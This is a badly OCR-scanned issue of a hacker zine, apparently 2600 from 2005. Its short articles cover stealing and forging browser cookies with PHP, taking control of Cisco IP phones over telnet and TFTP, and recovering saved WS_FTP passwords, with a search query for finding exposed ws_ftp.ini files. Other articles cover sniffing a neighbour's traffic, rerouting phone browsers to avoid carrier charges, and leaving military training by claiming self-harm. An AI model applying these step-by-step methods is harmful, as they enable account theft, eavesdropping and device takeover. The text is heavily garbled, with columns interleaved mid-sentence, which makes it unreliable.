but I thought that people who are entering i n
critical information on a computer need t o know
where it is going and who has access t o it.
Other places you might find interesting:
\
BestBuy:
On their employee PCs near the CDs, control A
and Z three times brings up the employee toolkit
(this varies by store but it's a combination of con-
trol, alt, or shift with two keys on the keyboard),
which you need a login t o use. On the demo PCs
you can either double click the numbers on the
right hand side or press control M t o minimize the
advertisement so you can access the drive. Their
laptops usually have Internet access due t o a wifi
connection i n the store.
Circuit City:
Their PCs are open and have a connection t o
the net. The world is yours.
Shoutz: z3r0, shady, lucas, mayo, and josh.

by Vi leSYN Scookievsl l i e 2 - " 8 ";

$cookievalue3 = "25";
It's 10 pm. Do you know where your cookies
are? I'm going t o go over a few ways that cookies setrawcookie ( "password ",$cook
can be exploited, and why it's not a good idea t o Wievalue, time()+3600, "/", ".fake.com",
keep them i n your browser. I E keeps the cookies 0);
i n "\Documents and Settings\O/~UseP/o\Local setrawcookie( "lastvisit ",$cook
Settings\Temporary Internet Files", with the file
name starting with "Cookie:". Mozilla on the
"'"'
~fe~~:~~&,,t3:~
setrawcookie( "userid", $cook
other hand saves the "cookies.txt" file i n ~ i e v a l u e 3 , time()+3600, "/",
- /.mozilla/default/<random>.slt, and Firefox ".fake-com", 0);
?'
stores it i n "/.mozilla/firefox/default.s2e/. Last,
safari keeps itsu ~ o o ~file es in p ~ i sHere
. -/Li t ~ you set three cookies, "password",
sbrary/Cookies/. "Lastvisit", and "userid". Each cookie i s assigned a
that we know where they are, the ques- value, an expiration date, a path, a domain, and
tionis what to do with them. Any of the cookie a boolean secure integer. There i s one trick t o
files can be copied and used with the same type this though. If YOU t r y this code as it is, it w i l l not
of browser on a different machine, With the set the cookies. If the browser does not see that
snarfed cookies, you can Log into the domains the server resolves t o the domain, it fails. Of
that hold cookies and see what data is encapsu- course, there are ways around this. You simply
lated inside. edit your "hosts" file, and add a Line like this:
Other ways t o capture cookies include using 127.0.0.1 fake.com
Cain & Abelfrom oxid.it on Windows systems. An- When you navigate t o fake.com/cookie.php,
other i s t o sniff packets. Using tcpdump or any you will resolve t o yourself, and the cookies will
other sniffing utility, monitoring the H l l P port set themselves. With the "." i n front of the do-
it's going through and using an unlimited main, a l l hosts are effected by this cookie. You
snaplen can show some interesting results. What can then navigate t o the original web server (i.e.,
you are looking for is this: www.fake.com) and it will recognize the cookie
as being there. I f the values came from a legiti-
Set-Cookie: cookiename=cookievalue; ex mate source, then the server will see the cookies
,pires=expiredate; path=directorypath;
domain=domainname.com as being just as legitimate as long as the expira-
YOU can then take that information and tion has not been reached. So that's it. Happy
forge your own cookies with a PUP file ~narfing!
like this:
<?php
Thanx to FBSDHN, SE, and Dale "The Sandgog-
Scookievalue = " I "; gle" Texas.
ZbDD t l a g a z i n e l
 by Kong
I was recently hired as a field-network techni-
cian at a major cable company. Idon't want t o
name names, but Iwill drop a hint and let you
know that they own AOL, CNN, and several other
big names. The title of my j o b really means noth-
ing. Ijust go t o customers' homes or businesses
and set up wireless and wired networks. Interest-
i n g stuff but nothing too interesting. Idid this
for a month or so until Iwas given an opportu-
nity t o switch over t o the Voice over I P (VoIP) de-
partment. Being an avid phone phreak Idecided
t o take this opportunity. After an intense train-
i n g session, Iwas left with a little more knowl-
edge then Ihad before and a training manual.
Since selling the manual on eBay seemed out o f
the question, Idecided the best place t o share
my new information would be i n an article.
The first misconception many people have
with VoIP i s that your phone calls go over the I n -
ternet. While this is true with Vonage and other
Internet phone companies, it is far from the truth
with the phone system Iwork on. The VoIP sys-
tem consists of the following:
MTA: Media terminal adapter - cable modem.
Coaxial Network: Coaxial cable is television
cable, enough said.
CMTS: Cable modem termination system, more
on this later.
MGC: Media Gateway Controller, see above
notes.
PSTN: Public switched telephone network,
telco's existing network.
The MTA works on the same basic principals as
a standard DOCSIS (Data Over Cable Services I n -
terface Specification) cable modem. It even uses
the same channelin the RF spectrum. It can even
look the same as a standard cable modem except
i n addition t o an RJ-45 jack and US6 port, it will
also have an RJ-11 jack for a phone. This means
i n almost a l l cases Internet and phone are run
from the same device and the same coaxial cable.
Both functions have their own MAC address and
also their own I P address. Most cable modems
have a buffer of 1500 bytes which will last about
10 seconds and will cause some noticeable delays
on streaming video or music as packets are loss.
Since delays for voice are unacceptable, the
phone part of the modem only has a buffer of 160
bytes or about 20 milliseconds. This means t h a t if
a packet is lost for voice, there i s no chance of it
being resent. As mentioned earlier data and voice
\Spring 1?005
share the same channels for upstream and down-
stream. To cut down on lost voice packets, they
are given priority over data packets. This could
cause some performance drops while surfing but
they are hardly noticeable. The RJ-11 jack on the
MTA acts the same as a jack t h a t i s hooked up t o
telco wiring, meaning it supplies -48 volts DC for
on-hook and 90 volts AC for ringing and a l l t h a t
good stuff. It also supports d u a l tone multi fre-
quency (DTMF). The MTA also has t h e j o b o f
changing the analog voice signal i n t o digital
packets. Once the MTA has transferred t h e pack-
ets, it sends them through t h e coaxial cable i n
your neighborhood t o t h e CMTS.
The CMTS i s also the same as w i t h a standard
cable modem. It is located at a cable company of-
fice and terminates the packets f r o m t h e coaxial
cable t o either fiber optics or Ethernet. For Inter-
net, it routes t h e packets from t h e i r office t o t h e
Internet. I n the case of phone, it keeps the pack-
ets on a managed network controlled by t h e cable
company and used for VoIP only. Packets are
routed t o different parts of t h e network depend-
i n g on who is calling whom. Eventually they are
dropped o f f a t the MGC.
Once the packets arrive a t t h e MGC they are
further analyzed t o decide where they are going
one last time. The job of the MGC i s t o send and
receive packets t o and from t h e PSTN. So basi-
cally a l l the cable company has t o do i s get the
packets from your house t o their office and then
drop them o f f at the telco and l e t them deal with
it from there.
This article i s a condensed version o f a 500
page manual but Ihave included t h e most impor-
t a n t parts. There are a few minor details Ihave
l e f t out such as various servers t h a t do nothing
more than make sure your phone i s on the hook
or o f f the hook, let people know your number i s
disconnected, etc. A good section o f t h e training
manual also deals with how t o hook t h e MTA up
t o the customer's exiting phone wiring so they
can use a phone i n every room instead of just
plugging a phone i n t o t h e MTA. That section i s
not that interesting and most people with any
phone experience professional o r n o t shouldn't
have t o worry too hard about that. The main idea
o f this article was t o outline h o w and why t h e
system works. Keep i n mind t h a t once the pack-
ets leave the MTA they are standard I P data pack-
ets and can be sniffed like a n y other packet
regardless o f medium (coax, Ethernet or fiber).
page 35'
 by Moby Disk
This article pertains t o the Cisco 7940 and
7960 I P phones. For those new t o IP phones, they
function like normal office phones on a PBX but
they run over Ethernet. This makes them highly
hackable. The Cisco phones have a monochrome
pixel-addressable LCD display. They communicate
via 10/100 Ethernet at f u l l or half duplex. The
firmware i s updateable and Cisco provides
firmware t o support several voice protocols.
Power can be provided via AC or via unused wires
on the Ethernet cable. The phones communicate
with a call manager server that handles configu-
ration, mailboxes, etc. The phones support a
wide variety of protocols. This article will use the
main configuration protocols including Dynamic
Host Configuration Protocol (DHCP), Trivial File
Transfer Protocol (TFTP), and Telnet. Other sup-
ported protocols used include DNS, SNTP, and
ICMP. Real-Time Transport Protocol (RTP) i s used
for audio (Cisco 3). Various protocols including
SIP, MGCP, and SCCP are used for signaling other
phones. H l l P is supported for downloading
graphics t o display on the LCD.
1 the menus or buttons physically on the phone.
I Looked into these phones first out of hacker
curiosity: This is a great example of digital con-
vergence. Iwas amazed that these phones were
actually computers and that Icould communicate
with them using my desktop PC. Ialso wanted t o
know how secure they were. Could someone lis-
ten i n t o calls? Fake calls? Make the phones ran-
domly yell insults at coworkers? Well, I was
L
surprised t o find that Cisco didn't even put one
b i t of thought into security. It is trivial t o do a l l
of these things and more. Let's see how.
Required Tools
All you need t o execute the basic hacks is ac-
cess t o the network that the phones reside on. I f
your computers are on the same switch as the
phones, you can just use your desktop PC. Other-
wise, obtain a hub. A plain Windows 2000 work-
station includes the necessary Telnet and TFTP
client. Some of the more advanced tricks require
a TFTP server. I f you do not have physical access
t o the phones themselves, you will need a sniffer
t o determine the IP addresses and names of the
phones.
Security
The Cisco phones Iused provide no security
whatsoever. Every employee necessarily has
physical network access. A wireless router would
allow anyone t o remotely control your phones
without physically being i n the office. I n this
particular office, the phones were actually acces-
sible from outside the office! Once Ihad the IP
addresses, Iwas able t o telnet t o the phone on
my desk from my home PC.
Newer versions of the Cisco Call Manager soft-
ware require digital signatures t o make it more
difficult t o spoof firmware updates and also sup-
ports IPSEC. I f you do use an I P phone system, I
strongly recommend using the latest software
and enabling IPSEC. You should also configure
the phones t o disable Telnet access. This can be
subverted by spoofing the TFTP server and send-
i n g fake configuration files, but that i s much
more difficult.
Hacking
So what exactly can be done remotely with
these phones? You can do anything available via
Remotely change phone settings
Change the ring tones (predefined tones or use
your own)
Modify the firmware
Change the logo on the display
Redirect the company directory or the voice mail
Remotely control phones
Initiate calls (with speakerphone)
h a k e the phone ring
Adjust the volume
Take phone on/off the hook
Crash the phone
Without IPSEC, you should be able t o eaves-
drop on phone calk with a packet sniffer. I n the-
ory, you could redirect phone calk or change
voice mail settings, but these are truly malicious
activities and Idid not research how t o do this.
These actions would require I P spoofing which i s
beyond the scope of this article.
HOW-TO
Start with physical access t o the phones and
assume each phone i s password protected. Get
the I P address, host name, and TFTP server for
each phone by pressing the configuration button
(the one with the picture of the check box) and
selecting Network Configuration. The host name
w i l l be something like 000CAED39328. I f you do
not have physical access t o the phone, then you
w i l l need t o sniff for this information.
The main configuration menu
,* , tains the description and f i l e name for each ring
-
--
L-iV
Next, use a TFTP client t o retrieve t h e files \
"RingList.datU, "SIPDefault.cnf', and "SIPxxxxxx
~ x x x x x x . c n f ' where t h e x's represent t h e host
name of the phone. Replace SIP with SCCP or
MGCP if your server uses one o f these protocols
(Cisco 1). The configuration f i l e s are plain text
files containing the server settings, phone num-
bers, telnet Level, and an unencrypted password.
Settings are the default configuration file and
may be overridden i n each phone's configuration
file.
This password also allows y o u t o change con-
figuration settings via the phone's menus by se-
lecting the "Unlock Configuration" option i n the
configuration menu. You may also telnet t o the
phone using the I P address and password. From
here, you can execute many commands. A f u l l list
of commands i s available a t (Cisco 2).
The test key command i s t h e most fun. Press-
i n g thevolume buttons causes t h e phone t o ring.
You can change settings such as ringtones by
simulating the navigation keys. I t i s possible t o
pick up the speakerphone and dial, then connect
t o the destination phone and i n s t r u c t it t o pick
UP.
Changing Ring Tones a n d O t h e r Settings
You can select any of t h e standard ring tones
using the phone or via telnet. Ringlist.dat con-
tone. You can download the r i n g tone files via

;4 4.-:
. .
7

TFTP, but you cannot upload n e w ones t o the

r2-i,-,-
tts- ( 7 ~ : server. The ring tone files are 8 kHz 8-bit u-law
audio files <=2 seconds long (Cisco 3).

Close the telnet session.

est open Enter hacbng mode.
est close Emt hacking mode.
The network configuration screen showing
t h e DHCP sewer. MAC address. and host name.
volup: Volume up
Notice t h e "lockn icon i n next t o t h e title, indi-
headset: Headset
cating t h a t we cannot change t h e settings yet. spkr: Toggle speakerphone
mute: Mute
info: Info
msgs: Messages
sew: Services
dir: Directories
set: Settings
navup: Navigate up
navdn: Navigate down

test string Stn'ng can be any number o f 0..9, #, and *.

This allows you t o control t h e menus and t o dial
test onhook Place the phone on or off hook, as though someone
test offhook picked it up. Can be used t o answer calls. Improper
use of this can cause the phone t o confuse on and
off hook (picking up the receiver can become the
on hook state, and vice-versa)
test ? Ask the phone what keys it supports. This is useful
test help i f your phone has additional navigation "soft" keys.

<Spring ZOO5 Page 1 7 1


/ Using the existing ring tones i s neat, but
making your own i s very cool. Since you cannot
upload files t o the TFTP server, t o use your own
ring tones you need t o set up your own TFTP
server and direct the phone t o use it. I n the
phone's configuration screen i s a setting "Alter-
nate TFTP." Set this t o yes. Then change the "TFTP
Server" setting t o contain the I P address of your
server. Now you can serve up your own firmware,
ring tones, and configuration files. Serving your
own configuration file allows you t o change the
URL for the logo on the display, the URL for the
corporate directory, and the phone number for
the voice mail. Logo files must be 8-bit BMP files
even though the LCD is black-and-white (VOIP 4).
It looks like the corporate directory browser
works like a minimal text-only web browser.
I n this particular office, the phones did not
have working DHCP so the H l l P server for the
logo had t o be a single-homed H l l P server t h a t
was accessible by IP.
Conclusions
I P phones are gaining i n popularity since they
are becoming versatile, powerful, and easy t o in-
stall. Pricewise, they are competing very effec-
tively against existing PBX systems. Expect t o see
rapid growth i n the future. However, expect t o
see more stringent security i n place now that the
by H2007
This file i s intended t o show you how t o view a
password saved i n WS-FTP.ini using WSFTP itself.
Tools needed: WS-FTP - any version.
Step 1) Copy the user's WS-FTP.ini file stored
i n \..\..\WS-FTP\. Take a copy of the WS-FTP.ini
file and place it i n your \wS-FTP\ directory.
Step 2) Open the file i n any text editor of your
choosing. Here is a short example of what you
will see.
[ WS-FTP321
HOST=ftp.randomftpserv.cOm
UID=h2007
DIR= "/pub/win32 "
PASVMODE=l
TIMEOFFSET=O
PWD=V9D8F029E316E1B1C2B2D1B173817B8936B3
B6A39A6A6A277AESB
TYPE=6010
The text i n brackets [WS_FTP32] is the profile
name set by the user. Selecting that is how you
will display the information i n WSFTP. HOST i s of
course the host address. UID is the valid user
(name we will be using. PWD i s the "encrypted"
7
phones ship with IPSEC. For now, have fun by
listening i n on meetings and making your
coworkers' phones taunt them.
References
(1) Information on the bootup process and
the files residing on the server: "Converting a
Cisco 7940/7960 CallManager Phone t o a SIP
Phone...", Cisco Systems 1992-2004; http://www
~.cisco.com/warp/public/788/voip/handset~to
e-sip.html
(2) Telnet commands, monitoring options,
and troubleshooting tips: "Monitoring Cisco SIP
I P Phones (Versions 6.x and 7.x)", Cisco Systems
1992-2004; http://www.cisco.com/en/US/prod
*ucts/sw/voicesw/ps2156/products_administra
~tion~guide~chapter09186a00801d1988. html
(3) Physical phone setup, ring tones: "Getting
Started with Your Cisco SIP IP Phone (Version
1.0)", Cisco Systems 1992-2004; http://www.
~cisco.com/en/US/products/sw/voicesw/ps215
r6/products-administration-guide-chapter091
~86a0080087511.html
(4) Logos, messages, directories, ring tones,
general information, and Links: "Configuring
Cisco 79xx phones with Asterisk", Arte Marketing
2004; http://www.voip-info.org/wiki-Asterisk%
~20phone0/~20cisco0/02079xx
password we are attempting t o view.
Step 3) Sure, you can simply connect with the
password i n i t s masked form like it currently is.
However our agenda here is t o decrypt it so we
can view the password itself. Why? To know a
valid password that the user uses.
I n the UID area, copy and remove the user ID
(in this case "h2007") and replace that with
"anonymous". So UID=h2007 should now read
UID=anonymous.
Step 4) The fourth and final step i s very sim-
ple. Execute WS-FTP95.exe, click Connect and se-
lect the appropriate profile name. Voila, you now
have an unmasked valid password, user name,
and host. I n this case our password is
"2600rocks!"
Many schools and businesses use this soft-
ware. It is not hard t o find several valid user
names and passwords just by gaining access t o a
user's \WS-FTP\ directory. You can also google
"intitle:index.of ws-ftp.iniW and you will find
several results.
Happy Hacking!
 by RSG
Packet sniffers are incredible learning tools.
Like many people, I have a wireless Internet
router installed i n my apartment. It creates a
small, wireless Local Area Network (LAN) which
provides connectivity for my three computers.
The other day Iwas tooling around on my
LAN, using my trusty packet sniffer t o learn more
about how my router works and how the various
computers interact on the network. All o f a sud-
den Inoticed a f i f t h I P address was sending and
receiving data. Five? But Ionly own three com-
puters and a router. Bingo, Ihad a wifi leech.
Wifi leeches are fairly common these days. It's
a very common practice t o jump on an open wifi
node when you see one available. 2600 has even
provided information on more than one occasion
on how t o detect wireless nodes (for example,
see the cover design for the Summer 2002 issue).
I've always thought, perhaps somewhat naively,
that open wireless was better then closed and
thus had never blocked access t o my router using
a password or MAC address filtering. But this time
it was personal. Iwas curious. Who was this
leech?
First a disclaimer: I'm not a professional
sysadmin, nor am Ia low-level protocol ninja.
But I've managed t o teach myself a thing or two
about how networks work. This article is meant t o
be introductory. Comments and additions are en-
couraged.
Ihad t o move quickly. Itoggled back t o the
terminal where my favorite packet sniffer, tcp-
dump, was running. Tcpdump is ubiquitous. If
you run a *nix operating system you most likely
already have it installed. (Windoze people can
use a port called "WinDump.") Since Iwanted t o
ignore a l l traffic except for the data going
to/from my leech, Irestarted tcpdump using the
"host" argument and my leech's I P address:
/usr/sbin/tcpdump -SO -i en1 -Aa host
W192.168.1.103
Irun Mac OSX, so the "-i e n l " flag means sniff
on my en1 internet adaptor, i.e., my airport card.
The "-Aa" and "-so" flags are the juicy parts. They
t e l l tcpdump t o suck down the f u l l packets i n hu-
man-readable ASCII text. Fun! Check the man
( pages; your mileage may vary. A nice alternate t o
tcpdurnp i s Ethereal. Mac people should also
check out EtherPEG which reassembles JPEGs or
GIFs i n real time as they flow by.
Okay, Ihad my leech trapped. But what could
ILearn? First, Inoticed a Media Access Control
(MAC) address i n t h e tcpdump output. These are
unique hardware addresses assigned t o network
adaptors. With a MAC address y o u can look up the
vendor of the machine. I plugged t h e MAC ad-
dress into http://www.coffer.corn/mac~find and
made a note o f my Leech's computer type. After
sifting through a few more pages of tcpdump
output, I learned the make a n d model of my
leech's computer as well as t h e t y p e and version
number of the operating system, plus t h e make
and model o f my leech's printer. Hmmm, should I
send over a print job?
You'll get a l o t o f uninteresting garbage, but
here are a few strings t h a t are helpful t o grep
through the tcpdump output with: @, GET, OK,
USER, <html>. You'll no doubt discover your own
favorite strings t o grep on.
After a day or two, Ihad discovered a whole
l o t about my leech: his name, t h e names o f his
two email providers, the names o f t h e email lists
he was subscribed t o (google t h e "SurvivePX"
email list for a giggle), t h e names and email
addresses of his friends ....You g e t t h e picture.
So here i s the dilemma: if someone i s stealing
your bandwidth, i s it okay t o spy on them? I ' m
afraid the ethical answer i s probably no. But still,
if Icould read his email, then h e could read mine
(if he had half a brain). I n effect, Iwas reminded
of the importance of security a n d privacy: use en-
cryption, and if you keep your node open (as I
opted t o do), be conscious o f how people are
using your network at a l l times.
My Leech prompted me t o learn a l o t about
how data moves around a LAN a n d what sort o f
information is revealed about a user. Ihope this
was useful t o you. For more information on net-
work protocols Iwould recommend W. Richard
Stevens' book TCP/IP Illustrated, Volume 1 (Addi-
son Wesley) and Eric Hall's Internet Core Proto-
cols (O'Reilly); For t h e technical specs o f I P and
TCP you should also be sure t o read RFC 791 and
RFC 793. Happy leech hunting.
 vbv Josh D
Let me just say h g h t out that some of the
ideas described i n this article may not be per-
fectly legal - this article is meant t o be educa-
tional and if you attempt t o execute any of the
ideas presented here, Iwill take absolutely no re-
sponsibility for extra cellular charges you may in-
cur or for any trouble you may get into with your
cellular provider.
What i s WAP?
WAP is an acronym that stands for Wireless
Access Protocol, which i s (on a very basic level)
the technology that a cellular phone uses t o con-
nect t o the Internet. There are several WAP
browsers and the one t h a t w i l l be described today
is called Openwave, which comes preinstalled on
a bunch of cell phones. I have personally seen
Openwave i n use on LG and Kyocera phones, but
I'm sure these aren't the only phone brands that
use Openwave.
Openwave is generally not that hard t o tweak.
Once the browser is running on a cell phone, one
just has t o press and hold down the zero button
(or menu button depending on the phone manu-
facturer) on their phone until they are greeted
with a menu full of everyday browser features,
such as "Reload" and "Bookmarks." The last item
on the menu is "Advanced", which i s where the
configuration of your WAP setup w i l l eventually
end. I f you're following along on your own cell
phone and you're seeing what I'm describing, you
most likely have a cell phone manufactured by LG
or Kyocera and your cell phone company (if you
live i n the US) is probably Verizon.
You'll notice that i n the "Advanced" menu,
there is an option called "Set WAP Proxy". Keep
this function i n mind. A WAP Proxy i s just an I P
and a port that point t o what's called a WAP gate-
way, a program running on a computer that acts
as a gateway (hence the name) allowing a cell
phone t o connect t o the wireless Internet. It's
fairly easy t o set up your own gateway, using your
own computer's Internet connection. I use a
gateway called WAP3GX, available at http://www
r.wap3gx.com.
A detailed explanation of configuration of a
WAP gateway is beyond the scope of this article,
but just know that the gateway (at least this i s
true for WAP3GX) listens on UDP ports 9200 and
9201 and that you'll need t o configure your
router and/or firewall accordingly t o forward
,these ports t o your computer. I f you're too lazy or
.u
don't want t o attemDt t o set uo vour own WAP
gateway, you can jukt use the brier public WAP
gateway provided by http://www.waptunnel.com
at 207.232.99.109:9200 or 207.232.99.109:9201.
The only reason Irecommend setting up your own
WAP gateway i s because Waptunnel's tends t o not
work very well most of the time (although you
can find other public gateways if you Look around
on Google). For now, let's just assume you have
acquired an I P and a port of an active WAP gate-
way. The next problem is just getting a l l of this
information into your cell phone.
My main areas of expertise include cell
phones made by LG and Kyocera, so I ' l l briefly de-
scribe how t o get into the service menu of cell
phones made by those respective companies. On
the newer LG phones with color screens, when
you h i t the menu button from the home screen
you'll notice there are nine menu choices from 1-
9. Ever wondered why they didn't start at zero?
Try hitting the zero button. You'll be asked t o en-
ter i n a six-digit service code, which is usually a l l
zeros. Now you're i n the service menu of the
phone, and Iwouldn't touch anything you don't
feel confident i n messing around with, because
it's pretty easy t o render a phone unusable by en-
tering i n incorrect settings. You'll want t o select
"WAP Setting" from the service menu and then "IP
Sem'ng". Select "Link3-IP1". Write down what you
see on a piece of paper i n case something goes
wrong (so that you can "reset" the phone t o its
default settings if you need to) and then replace
the listed IP with the I P of your WAP gateway
(don't enter the port). Hit OK and then h i t CLR.
Select "Port Setting" from the menu, then select
Link3-Portl, then again write down what you see,
then enter i n the port of your WAP gateway. Hit
OK and then END. Ihave tested this method with
LG VX4400 and VX6000 cellphones but it will work
for other LG phones, although accessing the ser-
vice menu might be a little different - you might
have t o press menu and zero at the same time, or
press and hold menu and then press zero, or vice
versa.
On the other hand, if you have a Kyocera
phone go t o the home screen and enter i n the
number 111-111like you were going t o call that
number. You'll see a menu option pop up on the
bottom of the phone. Scroll until you see a menu
item called "Options", select it, and find another
menu item called "Browser Setup". This is basi-
cally the same as the LG setup from here, except
G s t e a d of "Links", there are "Uplinks", and there
are only two of them. Change the information i n
Uplink B t o that of your WAP gateway.
The service menu i s the trickiest part of this
operation, and if you're having trouble entering
seth'ngs or if you find my instructions inadequate
or have a phone manufactured by a company
other than LG or Kyocera, there i s plenty of infor-
mation about a l l this on the Internet
(http://www.howardforums.com i s a good place
t o start.) - j u s t search for "WAP".
The hardest part i s now out o f the way. Try re-
opening your WAP web browser and change the
active WAP Proxy (as described i n the beginning
of this article) t o Proxy 3 if you have an LG Phone
or Proxy B if you have a Kyocera phone. I f you see
a page asking you t o enable security features, it
means t h a t you haven't properly configured the
browser t o conned t o your WAP gateway - you're
still connecting t o your cellular provider's gate-
way. I f everything went according t o plan, the
phone should connect t o your gateway and
prompt for a default home page t o display. Note
that most o f the WAP-enabled phones only can
browse through and display WML (Wireless
Markup Language) pages as opposed t o HTML
pages, so you'll need t o go hunting for WML
pages. Google's wireless WML page is located at
http://wap.google.com, which is nifty for find-
ing other WML sites. Wireless Mapquest i s located
at http://wireless.mapquest.com/aolmq_wml,
and wireless Superpages i s located a t http://wap
~.superpages.com/cgi/cj_client.cgi, t o name a
few sites. All of these Links would be entered into
your cell phone a t the prompt.
Browsing isn't the only thing you can do with
by Bac
This article i n no way supports using these
methods and is only written for informative pur-
poses. I f you sign up, you should stick it out like a
good sedceperson.
These observations were done when Iwas exit-
ing the USAF during my Basic Military Training
segment. From what Ican t e l l the system is set up
t o bounce back people who are questionable once
they enter into the service.
So you are going into the military. Be sure t o
have long talks with your recruiter, ask lots of
questions, and make sure you can quote question-
able remarks or what may be blatant Lies verbatim.
That is the first thing you can do t o protect
WAP, however. I f you use Cerulean Studio's mulb-
.\
network chat program, Trillian Pro (available at
http://www.trillian.cc/), you can download a
plug-in for Trillian called I.M. Everywhere, which
i s available a t http://www.iknow.ca/imevery-
where/. This program i s a miniature HTTP server
(not a WAP gateway) t h a t w i l l l e t you I M anyone
that i s on your Trillian buddy list from your
phone. Trillian supports ICQ, AIM, MSN Messen-
ger, and Yahoo Messenger, which means t h a t you
will be able t o I M a l l of your buddies on your
phone without paying for text messages. I.M.
Everywhere broadcasts i n both WML and HTML so
you would enter your own I P i n t o t h e default
home page prompt on your phone t o get this
working, or you could enter your I P i n t o any I n -
ternet browser on a computer a n d use I.M. Every-
where t o controlTrillian remotely.
One very important thing t o n o t e i s t h a t WAP
requires cellular airtime. You w i l l be charged, i n
minutes of time spent on the wireless web, for
data transfer on your phone bill. There i s no extra
charge for wireless Internet (like there normally
would be), only regular airtime "talking" minutes
(at least with Verizon), which means t h a t you w i l l
most likely have free WAP nights and weekends -
instead of seeing a dialed number on your phone
bill, you would just see "DATA TRANSFER". Your
cellular provider will almost definitely not sup-
port doing what is outlined here - so i f you're go-
i n g t o t r y any of this on your own, t r y it with
caution. Again, Itake absolutely no responsibil-
i t y for extra cellular charges you may incur or for
any trouble you may get i n t o w i t h your cellular
provider if and when you t r y a l l o f this. That said,
have fun and Ihope you learned something!
yourself from what could possibly happen.
I n fact, everyone who leaves within the first
180 days of service is granted an "entry level sep-
aration," be it for good reason, b a d reason, or ugly
reason. So the scare tactics they use t o keep you
i n Line are i n fact not quite as valid as stated. (You
know the good ole UCMJ.) That does not fully ap-
ply until after your first 180 days o f training.
Most of the way the exit process works is very
compartmentalized. Each person a t a desk knows
little t o nothing about the other links - from the
people i n your, own wing, t o the BAS, t o the pro-
cessing folk, t o the docs and other assorted peo-
ple. Some are enlisted, some are civilians, and
some are officers. Not one person has all the

G w e r s . All of this Ihad t o learn from experience
with all the various people involved i n this
process.
The intent of all the processes is t o deter peo-
ple from leaving. The military is having major is-
sues with retention so every effort is made t o
return recruits t o training.
Also, some of the information that Ireceived is
rumor. Here is my attempt t o separate fact from
fiction on the subject of exiting.
1.Your recruiter cannot lie t o a superior i n re-
gards t o direct questioning about a statement.
2. The service will do whatever it can t o stick
you with the bill and not pay you, such as if you
come clean about a medical history issue, even if
your recruiter told you t o lie (this is where being
able t o quote questionable remarks verbatim is
important). They will most likely stick you with the
bill and send you home with some of your gear,
and may i n fact charge you.
3. They will send you back t o your point of en-
try or your home of record.
4. They will spend about two weeks processing
your file i n regards t o exit. Once you try t o Leave
it's not all easy. It is still military protocol and
even if you have a complete breakdown, it's no
walk i n the park. They may lock you up i n the men-
t a l ward at the hospital.
5. I f you try and get hurt or don't drink enough
water (heatstroke), they will just send you t o get
patched up and returned t o training.
6. The easiest way t o get isolated from your
I mhkbuster's Compass -
by Aristotle
As of March lst, 2005, every Blockbuster em-
ployee will have spent hours reviewing the new
software corporate uses for payroll management:
Compass. Created by Bluecube, the expansive
software package also includes training modules
t o help "streamline" future employee promotions.
At its core, the Compass training system i s a
series o f web-based PDF files and interactive
Flash media. Employees click through the se-
lected tasks or read the required documents, and
take a brief quiz when they have completed a
module. Tasks include learning how t o entering
your payroll corporate ID and password t o clock
i n and out, making schedule requests, and view-
ing their assigned work week. Sadly, there i s no
I way t o skip ahead, so anyone who has used any
menu-driven software before is required t o move
7
group of recruits and speed up the exit process is
t o claim self harm or a desire t o harm others, Ho-
mosexuality has t o be attempted i n practice, not
statement, i n order t o get removed from basic.
Also, i f you harm others I know nothing of the
process that they would use t o isolate you, but I
presume they would keep you heavily medicated.
7. Your medical history that you suppressed at
MEPS (Military Entry Processing Station) will prob-
ably come back t o haunt you i f you t r y t o use that
t o Leave. Simply put, the blame will be placed
upon you and your pay will be revoked, or they will
say you are claiming false diseases and return you
t o training.
8. This one is quite surprising. Going AWOL
(absent without leave) from BMT may only get you
an orange vest if you return willingly, along with a
required service of 40 days with the rest of the re-
jects, and forfeiture of pay. But you still get an
"Entry Level Separation."
9. I f you use illegal drugs, even i f you pass the
test at MEPS, they will test you for traces and kick
you out when they have the results back, even i f
you are a week from graduation from basic.
10. You can exit cleanly if you keep your ears
open and realize that the system is not as stacked
against you as you might think, and that the exit
routine is easy t o access.
This is entirely for informative purposes only.
It's intended for use i n case the draft is rein-
stated, or if you really make a major mistake by
joining.
' ?+ ! \
at the same pace as someone who has never seen
a keyboard. While this does ensure that every
employee has been presented with a l l the rele-
vant information, mind-numbing i n i t s redun-
dancy, it also ensures a l l but the most simple of
employees will ignore what they are supposed t o
read, feeling their very I Q being drained by the
system's tediousness.
Once the system goes live, it will schedule
employees according t o need, as judged by Com-
pass. I n the test run this week, many "full-time"
employees found they, had fewer than fifteen
scheduled hours i n the coming work week, while
lower-paid part-time employees were given an
excess. Unqualified personnel were scheduled t o
run store-wide inventories, and almost every in-
dividual I've spoken t o found they had been
scheduled during times at which they were un-
 \
Gailable. These problems may be resolved by porate each time) t o accomplish many mundane
launch, but it i s uncertain. tasks has already decreased productivity, two
Another aspect of the Compass system is i t s weeks prior t o the software's f u l l implementa-
ability t o be remotely monitored. Four times a tion.
shift the Manager-on-Duty (MOD) i s required t o 1, t h e big blue, ever strivingto
update the daily task list with what employees make the workplace more inhospitable and un-
had accomplished what, and at what time. At any bearable for employees, have continued t o as-
point i n the day, the district and regional direc- tound and confuse their workers with each
torate, and likely others higher On the additional bureaucratic layer they place beheen
chain, can see any store's updated task list. The
US a" Our customers. The meager
threat of constant surveillance isintended t o be
a Upowerful motivator," claimed one store man- paychecks they dangle before us d o little t o
ager during a meeting. assuage the knowledge t h a t we a r e i n fact part of
addition to disallowing employees from this machine. Iknow Ihave made my decision,
clocking outfrom their shifts at any time, a viola- and I'd Like t o thank Bluecube Software for assur-
tion of many states' labor laws, the numerous i n g me it was the right one.
checks and balances put i n t o place requiring a Related Links: www.blockbuster.com,
manager override (with a handy alert sent t o cor- www.bluecube.com

7
, , I

't
,
.'L
d
, , C.P--'
by Chess ' < E T A N&%RBOT~" CONTENT=,~NOINDEX,
"Just when I thought that I was out they pull , b ~ o ~ ~ ~ ~ ~ " >
me back in!" Learn t o stay out of Google. AlternaYively, you can allow every search en-
Most people are dying t o get their sites listed gine except for Google t o index Your Page. Just
i n Google. But what if you want your site out of add this tag:
Google's listings? Maybe you want t o keep your <META NAME= "GOOGLEBOT" C O N T E N T = " N O I N D E X ,
site private, or you don't want a bunch of creeps b N O F O L L O W r ' >
surfing t o your page trying t o find animal porn. This next tag will remove t h e "snippets" from
Maybe you just hate Google, are paranoid, or the Google results it returns. Snippets are the de-
have some copyrighted material on your page scriptive text underneath t h e URL when you p u l l
that you need out o f Google's cache today. What- up a list of Google results. It has your search
ever the case, it's actually pretty easy t o get out terms bolded within the snippet t o show you
